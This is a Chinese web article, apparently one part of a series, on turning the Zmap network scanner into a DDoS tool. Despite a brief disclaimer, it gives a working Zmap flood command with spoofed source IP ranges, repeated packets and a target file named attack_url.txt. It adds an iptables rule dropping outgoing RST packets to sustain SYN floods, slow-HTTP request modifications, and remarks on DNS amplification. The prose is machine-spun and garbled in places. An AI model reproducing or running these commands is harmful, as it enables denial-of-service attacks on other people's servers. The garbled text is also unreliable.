欢迎来到云服务器

网络技术

利用Zmap扫描网络及提倡DDOS进攻的要领(3)

  作者旨在存眷全网的扫描,并未提及相关DDoS 的信息。 也并未出格提供指向型发包的指令。 下面接头大概与作者想法相违,但愿列位重在技能钻研,而非一些恶意粉碎。

  指定ip段 和ip地点

  -w, --whitelist-file=path

  限制只扫描文件中的下列地点可能地点段,譬喻:

  222.222.221.82/24 (192.168.1.0-255 )

  (可操作种子 Cseed 调解从谁人IP开始)

  单个Ip地点

  222.222.221.82/32

  (随机找了一个,这里1.02版本测试不能直接,需要改 blacklist.c

  和constraint.c 中生成IP地点的二叉树的root节点一小部门代码)

  然后操作

  -P 10000000 (反复多次发包)

  -s 2000-60000 (配置一个大的端口段)

  -S 20.20.20.0-200.200.200.200(随机大量Ip地点,模仿漫衍式的D)

  -G 这个伪造mac (可是收不到数据包)

  Zmap Cp 80 -P 10000000 -s 2000-60000 -S 20.20.20.0-200.200.200.200 -w attack_url.txt

  见下列发送的数据结果,到达预期

  利用Zmap扫描网络及提倡DDOS进攻的要领

  大概造成什么样的危害? 可以设置IP Spoofing,syn flood,land attack, ICMP floods, Application floods 和其他UDP 全零等多种进攻。 Zmap 的发包速度甚至可以忽略一下 随后发的这个rst 包。 也可以做得完美一点就是操作iptables

  iptables -A OUTPUT -p tcp -m tcp --tcp-flags RST,RST RST,RST -j DROP

  把发出去的RST包给drop掉。

  可以再升一下?

  究竟有部门扩展能节制到应用层也是可以举办慢进攻。 Get 范例

  echo -e -n "GET / HTTP/1.1rnHost: %srnrn" > http-req 替换成

  echo -e -n "GET / HTTP/1.1rnHost: %srn " > http-req

  Post 范例 可以把源码sizeof(value) 的值配置一个大的动态数值。 Post数据配置很小。

  DDoS 流量 +毗连数 +畸形包

  流量根基只能硬防,拼硬件。

  zmap险些是最大限度操作网络带宽,10台G口处事器不会损耗几多,假如再操作DNS放大流量之类,很可怕的数字。

  Ps : Zmap 某些方面和python 的scapy很像。 但zmap 纯C实现,比scapy效率要高一些。 以前总是纠结scapy 随后发送RST 问题,这里操作iptables 方法确实是个好要领。 参考个中的源码和相对类型的API接口,编写一些模块可以玩出许多格式。

腾讯云代理

Copyright © 2003-2021 MFISP.COM. 国外vps服务器租用 梦飞主机测评 版权所有 粤ICP备11019662号